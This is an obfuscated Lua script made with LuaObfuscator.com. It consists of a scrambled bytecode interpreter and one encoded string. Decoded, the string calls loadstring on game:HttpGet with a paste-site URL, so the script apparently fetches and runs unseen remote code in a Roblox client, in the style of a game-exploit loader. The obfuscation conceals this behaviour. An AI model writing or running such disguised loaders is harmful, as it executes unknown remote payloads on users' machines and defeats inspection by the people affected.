--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * (493 -237)) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=v24();local v35=v24();local v36=2 -1 ;local v37=(v21(v35,620 -(555 + 64) ,951 -(857 + 74) ) * (2^32)) + v34 ;local v38=v21(v35,589 -(367 + 201) ,958 -(214 + 713) );local v39=((v21(v35,9 + 23 )==((1 -0) + 0)) and  -1) or (878 -((632 -(87 + 263)) + 595)) ;if (v38==(1637 -(1523 + (294 -(67 + 113))))) then if (v37==(0 + 0)) then return v39 * (0 -(0 + 0)) ;else v38=1066 -(68 + 997) ;v36=1270 -(226 + 1044) ;end elseif (v38==(8913 -6866)) then return ((v37==(117 -(32 + 85))) and (v39 * ((1 + 0)/((0 -0) + 0)))) or (v39 * NaN) ;end return v8(v39,v38-(1980 -(892 + 65)) ) * (v36 + (v37/((4 -2)^(95 -43)))) ;end v26=nil;function v26(v40)local v41;if  not v40 then v40=v24();if (v40==(0 + 0)) then return "";end end v41=v3(v16,v19,(v19 + v40) -(953 -(802 + 150)) );v19=v19 + v40 ;local v42={};for v65=2 -1 , #v41 do v42[v65]=v2(v1(v3(v41,v65,v65)));end return v6(v42);end v18=5;end if (v18==6) then v29=nil;function v29()local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do local v67=0 -0 ;local v68;while true do if (v67~=0) then else v68=0 -0 ;while true do if (v68==1) then if (v43~=3) then else local v101=0;while true do if (v101==0) then for v129=1 + 0 ,v24() do v45[v129-1 ]=v29();end return v47;end end end if (v43~=(0 -0)) then else local v102=14 -(9 + 5) ;local v103;while true do if (v102==(376 -(85 + 291))) then v103=1265 -(243 + 1022) ;while true do if (v103~=(3 -2)) then else v46={};v43=1;break;end if (v103==(0 + 0)) then v44={};v45={};v103=1181 -(1123 + 57) ;end end break;end end end break;end if (v68==0) then if (v43~=(2 + 0)) then else local v104=0;while true do if (v104==1) then for v131=1,v24() do local v132=0;local v133;while true do if ((254 -(163 + 91))==v132) then v133=v22();if (v21(v133,1931 -(1869 + 61) ,1)==(0 + 0)) then local v170=0;local v171;local v172;local v173;while true do if (v170~=2) then else local v176=0 -0 ;local v177;while true do if (v176~=(0 -0)) then else v177=0;while true do if (v177==(0 + 0)) then local v184=0 -0 ;while true do if (v184~=1) then else v177=1 + 0 ;break;end if (v184==0) then if (v21(v172,1,1)==(1475 -(1329 + 145))) then v173[973 -(140 + 831) ]=v49[v173[1852 -(1409 + 441) ]];end if (v21(v172,720 -(15 + 703) ,1 + 1 )==(439 -(262 + 176))) then v173[3]=v49[v173[1724 -(345 + 1376) ]];end v184=689 -(198 + 490) ;end end end if (v177~=(4 -3)) then else v170=6 -3 ;break;end end break;end end end if (v170~=(1209 -(696 + 510))) then else if (v21(v172,5 -2 ,1265 -(1091 + 171) )~=(1 + 0)) then else v173[4]=v49[v173[12 -8 ]];end v44[v131]=v173;break;end if (v170==0) then local v179=0 -0 ;while true do if ((375 -(123 + 251))==v179) then v170=1;break;end if (v179~=(0 -0)) then else v171=v21(v133,700 -(208 + 490) ,1 + 2 );v172=v21(v133,4,6);v179=1 + 0 ;end end end if (v170~=(837 -(660 + 176))) then else local v180=0 + 0 ;local v181;while true do if (v180~=0) then else v181=0;while true do if ((202 -(14 + 188))==v181) then local v185=0;while true do if (v185==0) then v173={v23(),v23(),nil,nil};if (v171==(0 + 0)) then local v190=0;local v191;while true do if (v190~=(0 + 0)) then else v191=0 + 0 ;while true do if (v191~=0) then else v173[6 -3 ]=v23();v173[5 -1 ]=v23();break;end end break;end end elseif (v171==(2 -1)) then v173[2 + 1 ]=v24();elseif (v171==(2 + 0)) then v173[3]=v24() -(2^16) ;elseif (v171==3) then local v196=0;local v197;local v198;while true do if (v196==(397 -(115 + 281))) then while true do if (v197==(0 -0)) then v198=0 + 0 ;while true do if (v198==0) then v173[7 -4 ]=v24() -(2^16) ;v173[14 -10 ]=v23();break;end end break;end end break;end if (v196==(867 -(550 + 317))) then v197=0 -0 ;v198=nil;v196=1 -0 ;end end end v185=1;end if ((2 -1)==v185) then v181=286 -(134 + 151) ;break;end end end if (v181==(1666 -(970 + 695))) then v170=3 -1 ;break;end end break;end end end end end break;end end end v43=3;break;end if (v104==0) then for v134=1991 -(582 + 1408) ,v48 do local v135=0 -0 ;local v136;local v137;local v138;while true do if (v135==(0 -0)) then v136=0 -0 ;v137=nil;v135=1;end if (v135~=1) then else v138=nil;while true do if (1~=v136) then else if (v137==(1825 -(1195 + 629))) then v138=v22()~=0 ;elseif (v137==(2 -0)) then v138=v25();elseif (v137==(244 -(187 + 54))) then v138=v26();end v49[v134]=v138;break;end if (v136~=0) then else local v175=0;while true do if (v175==1) then v136=781 -(162 + 618) ;break;end if (v175==(0 + 0)) then v137=v22();v138=nil;v175=1 + 0 ;end end end end break;end end end v47[6 -3 ]=v22();v104=1 -0 ;end end end if (v43==(1 + 0)) then local v105=1636 -(1373 + 263) ;while true do if (v105~=(1001 -(451 + 549))) then else v49={};v43=1 + 1 ;break;end if (v105==(0 -0)) then local v126=0;while true do if (v126==1) then v105=1;break;end if (0==v126) then v47={v44,v45,nil,v46};v48=v24();v126=1385 -(746 + 638) ;end end end end end v68=1 + 0 ;end end break;end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v50)if (v1(v50,2)==79) then local v69=0;while true do if (v69==0) then v20=v0(v3(v50,1,1));return "";end end else local v70=v2(v0(v50,16));if v20 then local v78=0;local v79;while true do if (v78==1) then return v79;end if (v78==0) then v79=v5(v70,v20);v20=nil;v78=1;end end else return v70;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v51,v52,v53,v54=v1(v16,v19,v19 + 3 );v19=v19 + 4 ;return (v54 * ((25309549 + 163019) -8695352)) + (v53 * (65877 -(218 + 123))) + (v52 * (1837 -(223 + 1312 + 46))) + v51 ;end v25=nil;v18=4;end if (v18==7) then function v30(v55,v56,v57)local v58=0;local v59;local v60;local v61;while true do if (v58==1) then v61=v55[3];return function(...)local v80=v59;local v81=v60;local v82=v61;local v83=v28;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=3) then if (v93<=1) then if (v93==0) then local v106=0;local v107;local v108;local v109;local v110;local v111;while true do if (v106==5) then v108,v109=v83(v90[v111](v13(v90,v111 + 1 ,v92[3])));v85=(v109 + v111) -1 ;v107=0;for v159=v111,v85 do v107=v107 + 1 ;v90[v159]=v108[v107];end v106=6;end if (v106==8) then v92=v80[v84];do return;end break;end if (v106==3) then v90[v111 + 1 ]=v110;v90[v111]=v110[v92[4]];v84=v84 + 1 ;v92=v80[v84];v106=4;end if (v106==7) then v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]();v84=v84 + 1 ;v106=8;end if (v106==6) then v84=v84 + 1 ;v92=v80[v84];v111=v92[2];v90[v111]=v90[v111](v13(v90,v111 + 1 ,v85));v106=7;end if (v106==1) then if ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v57;else v90[v92[2]]=v57[v92[3]];end v84=v84 + 1 ;v92=v80[v84];if ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v57;else v90[v92[2]]=v57[v92[3]];end v106=2;end if (v106==4) then v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v111=v92[2];v106=5;end if (v106==2) then v84=v84 + 1 ;v92=v80[v84];v111=v92[2];v110=v90[v92[3]];v106=3;end if (v106==0) then v107=nil;v108,v109=nil;v110=nil;v111=nil;v106=1;end end else v90[v92[2]]();end elseif (v93==2) then if ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v57;else v90[v92[2]]=v57[v92[3]];end else do return;end end elseif (v93<=5) then if (v93>4) then local v112=v92[2];local v113=v90[v92[3]];v90[v112 + 1 ]=v113;v90[v112]=v113[v92[4]];else local v117=v92[2];v90[v117]=v90[v117](v13(v90,v117 + 1 ,v85));end elseif (v93==6) then local v119=v92[2];local v120,v121=v83(v90[v119](v13(v90,v119 + 1 ,v92[3])));v85=(v121 + v119) -1 ;local v122=0;for v127=v119,v85 do local v128=0;while true do if (v128==0) then v122=v122 + 1 ;v90[v127]=v120[v122];break;end end end else v90[v92[2]]=v92[3];end v84=v84 + 1 ;end end;end if (0==v58) then v59=v55[1];v60=v55[2];v58=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v62,v63,v64)if v64 then local v71=560 -(306 + 254) ;local v72;while true do if ((0 + 0)==v71) then v72=(v62/(2^(v63-((812 -(569 + 242)) -(0 -0)))))%(2^(((v64-1) -(v63-(1468 -(899 + 568)))) + 1 + 0)) ;return v72-(v72%1) ;end end else local v73=0 -0 ;local v74;while true do if (v73==(603 -(268 + 335))) then v74=2^(v63-((1747 -(282 + 1174)) -(60 + 230))) ;return (((v62%(v74 + v74))>=v74) and (573 -(426 + 146))) or (0 + 0 + (1024 -(706 + 318))) ;end end end end v22=nil;v18=2;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F70617374652E6D79636F6E616E2E6E65742F342O382O35392E74787400083O00124O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
